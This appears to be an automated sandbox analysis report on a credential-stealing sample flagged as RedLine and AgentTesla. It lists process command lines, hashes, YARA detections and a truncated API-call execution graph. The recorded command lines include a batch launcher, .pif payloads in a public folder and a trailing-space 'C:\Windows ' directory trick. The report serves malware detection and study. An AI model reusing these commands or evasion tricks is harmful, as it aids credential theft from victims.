                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:21:31:58
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:21:31:58
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /c mkdir "\\?\C:\Windows "
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:21:31:58
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:21:31:58
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:21:32:09
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\Public\Libraries\Clmgncrs.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Clmgncrs.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'693'184 bytes
                                                                                                                                          MD5 hash:39AD433C9BA920E7FD0961C66AC7079E
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:21:32:13
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:21:32:17
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\Public\Libraries\Clmgncrs.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Clmgncrs.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'693'184 bytes
                                                                                                                                          MD5 hash:39AD433C9BA920E7FD0961C66AC7079E
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:21:32:20
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:5.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:16.2%
                                                                                                                                            Total number of Nodes:672
                                                                                                                                            Total number of Limit Nodes:38
                                                                                                                                            execution_graph 52143 29f765c MulDiv 52144 29f76ae 52143->52144 52145 29f7698 52143->52145 52159 29f0204 52144->52159 52209 29f7618 GetDC SelectObject GetTextMetricsA ReleaseDC 52145->52209 52148 29f76ba 52163 29f02a4 52148->52163 52149 29f769d 52149->52144 52210 29d4820 52149->52210 52155 29f7701 52160 29f020a 52159->52160 52161 29f02a4 14 API calls 52160->52161 52162 29f0222 52161->52162 52162->52148 52164 29f02cb 52163->52164 52165 29f02b1 52163->52165 52169 29f0308 52164->52169 52166 29f02b7 RegCloseKey 52165->52166 52167 29f02c1 52165->52167 52166->52167 52215 29f0274 13 API calls 52167->52215 52170 29d4820 11 API calls 52169->52170 52171 29f0331 52170->52171 52173 29f0351 52171->52173 52216 29d4cec 11 API calls 52171->52216 52174 29f0373 RegOpenKeyExA 52173->52174 52175 29f0385 52174->52175 52180 29f03c1 52174->52180 52176 29f03af 52175->52176 52217 29d4b0c 52175->52217 52226 29f02d0 13 API calls 52176->52226 52179 29f03bc 52229 29d4788 52179->52229 52181 29f03de RegOpenKeyExA 52180->52181 52182 29f03f0 52181->52182 52188 29f0429 52181->52188 52184 29f041a 52182->52184 52187 29d4b0c 11 API calls 52182->52187 52227 29f02d0 13 API calls 52184->52227 52187->52184 52189 29f0443 RegOpenKeyExA 52188->52189 52189->52179 52190 29f0455 52189->52190 52191 29f047f 52190->52191 52192 29d4b0c 11 API calls 52190->52192 52228 29f02d0 13 API calls 52191->52228 52192->52191 52194 29f0538 52273 29f0510 52194->52273 52197 29f0552 52276 29d4878 52197->52276 52198 29f05a1 52200 29d4788 11 API calls 52198->52200 52202 29f0596 52200->52202 52201 29f055d 52281 29f05b0 43 API calls 52201->52281 52214 29f0274 13 API calls 52202->52214 52204 29f0575 52205 29f0598 52204->52205 52207 29f0581 52204->52207 52282 29f019c 42 API calls 52205->52282 52208 29d4ed4 11 API calls 52207->52208 52208->52202 52209->52149 52212 29d4824 52210->52212 52211 29d4848 52211->52144 52212->52211 52213 29d2cc8 11 API calls 52212->52213 52213->52211 52214->52155 52215->52164 52216->52173 52218 29d4b1d 52217->52218 52219 29d4b5a 52218->52219 52220 29d4b43 52218->52220 52242 29d484c 52219->52242 52233 29d4ed4 52220->52233 52223 29d4b50 52224 29d4b8b 52223->52224 52247 29d47dc 52223->52247 52226->52179 52227->52179 52228->52179 52230 29d478e 52229->52230 52231 29d47a9 52229->52231 52230->52231 52232 29d2cc8 11 API calls 52230->52232 52231->52155 52231->52194 52232->52231 52234 29d4ee1 52233->52234 52241 29d4f11 52233->52241 52236 29d4f0a 52234->52236 52239 29d4eed 52234->52239 52235 29d4788 11 API calls 52238 29d4efb 52235->52238 52237 29d484c 11 API calls 52236->52237 52237->52241 52238->52223 52253 29d2ce0 11 API calls 52239->52253 52241->52235 52243 29d4874 52242->52243 52244 29d4850 52242->52244 52243->52223 52254 29d2cac 52244->52254 52246 29d485d 52246->52223 52248 29d47e0 52247->52248 52251 29d47f0 52247->52251 52250 29d484c 11 API calls 52248->52250 52248->52251 52249 29d481e 52249->52224 52250->52251 52251->52249 52264 29d2cc8 52251->52264 52253->52238 52255 29d2cc3 52254->52255 52258 29d2cb0 52254->52258 52255->52246 52256 29d2cba 52256->52246 52257 29d2dd5 52263 29d2da4 7 API calls 52257->52263 52258->52256 52258->52257 52262 29d686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52258->52262 52261 29d2df6 52261->52246 52262->52257 52263->52261 52265 29d2cd6 52264->52265 52266 29d2ccc 52264->52266 52265->52249 52266->52265 52268 29d2dd5 52266->52268 52271 29d686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52266->52271 52272 29d2da4 7 API calls 52268->52272 52270 29d2df6 52270->52249 52271->52268 52272->52270 52283 29f04c0 52273->52283 52275 29f0524 52275->52197 52275->52198 52277 29d484c 11 API calls 52276->52277 52278 29d4888 52277->52278 52279 29d4788 11 API calls 52278->52279 52280 29d48a0 52279->52280 52280->52201 52281->52204 52282->52202 52284 29f04d9 52283->52284 52285 29f04ed RegQueryValueExA 52284->52285 52286 29f0504 52285->52286 52286->52275 52287 2a39740 52297 29d68b8 52287->52297 52291 2a3976e 52302 2a38710 timeSetEvent 52291->52302 52293 2a39778 52294 2a39786 GetMessageA 52293->52294 52295 2a39796 52294->52295 52296 2a3977a TranslateMessage DispatchMessageA 52294->52296 52296->52294 52298 29d68c3 52297->52298 52303 29d4444 52298->52303 52301 29d4558 SysFreeString SysReAllocStringLen 52301->52291 52302->52293 52304 29d448a 52303->52304 52305 29d4503 52304->52305 52309 29d4694 52304->52309 52317 29d43dc 52305->52317 52307 29d46c5 52323 29d4608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 52307->52323 52309->52307 52312 29d46d6 52309->52312 52311 29d46cf 52311->52312 52313 29d471b FreeLibrary 52312->52313 52314 29d473f 52312->52314 52313->52312 52315 29d474e ExitProcess 52314->52315 52316 29d4748 52314->52316 52316->52315 52318 29d441f 52317->52318 52319 29d43ec 52317->52319 52318->52301 52319->52318 52324 29d5b78 52319->52324 52328 2a395f8 52319->52328 52342 29d1668 52319->52342 52323->52311 52325 29d5b88 GetModuleFileNameA 52324->52325 52326 29d5ba4 52324->52326 52346 29d5ddc GetModuleFileNameA RegOpenKeyExA 52325->52346 52326->52319 52329 2a39612 GetVersion 52328->52329 52330 2a39670 52328->52330 52365 2a17420 GetCurrentProcessId 52329->52365 52330->52319 52334 2a39636 52397 29e7200 44 API calls 52334->52397 52336 2a39640 52398 29e71ac 44 API calls 52336->52398 52338 2a39650 52399 29e71ac 44 API calls 52338->52399 52340 2a39660 52400 29e71ac 44 API calls 52340->52400 52558 29d15fc 52342->52558 52344 29d1670 VirtualAlloc 52345 29d1687 52344->52345 52345->52319 52347 29d5e5f 52346->52347 52348 29d5e1f RegOpenKeyExA 52346->52348 52364 29d5c18 12 API calls 52347->52364 52348->52347 52349 29d5e3d RegOpenKeyExA 52348->52349 52349->52347 52351 29d5ee8 lstrcpynA GetThreadLocale GetLocaleInfoA 52349->52351 52355 29d5f1f 52351->52355 52356 29d6002 52351->52356 52352 29d5e84 RegQueryValueExA 52353 29d5ea4 RegQueryValueExA 52352->52353 52354 29d5ec2 RegCloseKey 52352->52354 52353->52354 52354->52326 52355->52356 52358 29d5f2f lstrlenA 52355->52358 52356->52326 52359 29d5f47 52358->52359 52359->52356 52360 29d5f6c lstrcpynA LoadLibraryExA 52359->52360 52361 29d5f94 52359->52361 52360->52361 52361->52356 52362 29d5f9e lstrcpynA LoadLibraryExA 52361->52362 52362->52356 52363 29d5fd0 lstrcpynA LoadLibraryExA 52362->52363 52363->52356 52364->52352 52401 29d96ec 52365->52401 52368 29d47dc 11 API calls 52369 2a17469 52368->52369 52370 2a17473 GlobalAddAtomA GetCurrentThreadId 52369->52370 52371 29d96ec 42 API calls 52370->52371 52372 2a174ad 52371->52372 52373 29d47dc 11 API calls 52372->52373 52374 2a174ba 52373->52374 52375 2a174c4 GlobalAddAtomA 52374->52375 52404 29d4c4c 52375->52404 52379 2a174f1 52410 2a17028 52379->52410 52381 2a174fb 52418 2a16dd4 52381->52418 52383 2a17507 52422 2a21538 52383->52422 52385 2a1751a 52439 2a22740 52385->52439 52387 2a17530 52456 29e72ec 44 API calls 52387->52456 52389 2a1755a GetModuleHandleA 52390 2a1757a 52389->52390 52391 2a1756a GetProcAddress 52389->52391 52392 29d4788 11 API calls 52390->52392 52391->52390 52393 2a1758f 52392->52393 52394 29d4788 11 API calls 52393->52394 52395 2a17597 52394->52395 52396 29e7160 44 API calls 52395->52396 52396->52334 52397->52336 52398->52338 52399->52340 52400->52330 52457 29d9700 52401->52457 52405 29d4c50 RegisterWindowMessageA 52404->52405 52406 29e7b44 52405->52406 52407 29e7b4a 52406->52407 52408 29e7b5f InitializeCriticalSection 52407->52408 52409 29e7b74 52408->52409 52409->52379 52411 2a17195 52410->52411 52412 2a1703c SetErrorMode 52410->52412 52411->52381 52413 2a17060 GetModuleHandleA GetProcAddress 52412->52413 52414 2a1707c 52412->52414 52413->52414 52415 2a17177 SetErrorMode 52414->52415 52416 2a17089 LoadLibraryA 52414->52416 52415->52381 52416->52415 52417 2a170a5 10 API calls 52416->52417 52417->52415 52419 2a16dda 52418->52419 52472 2a16fc4 52419->52472 52421 2a16e48 52421->52383 52423 2a21542 52422->52423 52485 29ed8bc 52423->52485 52425 2a21558 52489 2a218f4 LoadCursorA 52425->52489 52428 2a21591 52429 2a215cd GetDC GetDeviceCaps ReleaseDC 52428->52429 52430 2a21603 52429->52430 52494 29f1fe4 52430->52494 52432 2a2160f 52433 29f1fe4 13 API calls 52432->52433 52434 2a21621 52433->52434 52435 29f1fe4 13 API calls 52434->52435 52436 2a21633 52435->52436 52498 2a21d24 52436->52498 52438 2a21640 52438->52385 52440 2a2274f 52439->52440 52441 29ed8bc 42 API calls 52440->52441 52442 2a22765 52441->52442 52443 2a22822 LoadIconA 52442->52443 52536 29f7524 52443->52536 52445 2a22845 GetModuleFileNameA OemToCharA 52446 2a2288e 52445->52446 52447 2a228b4 CharNextA CharLowerA 52446->52447 52448 2a228dc 52447->52448 52538 29eea38 GetClassInfoA 52448->52538 52451 2a22905 52549 2a24b14 11 API calls 52451->52549 52452 2a228fe 52548 2a22a94 60 API calls 52452->52548 52455 2a22927 52455->52387 52456->52389 52458 29d9726 52457->52458 52460 29d9759 52458->52460 52470 29d92f4 42 API calls 52458->52470 52461 29d9776 52460->52461 52462 29d97c3 52460->52462 52464 29d97b7 52461->52464 52466 29d4788 11 API calls 52461->52466 52468 29d4ed4 11 API calls 52461->52468 52471 29d92f4 42 API calls 52461->52471 52463 29d4878 11 API calls 52462->52463 52467 29d96fb 52463->52467 52465 29d4ed4 11 API 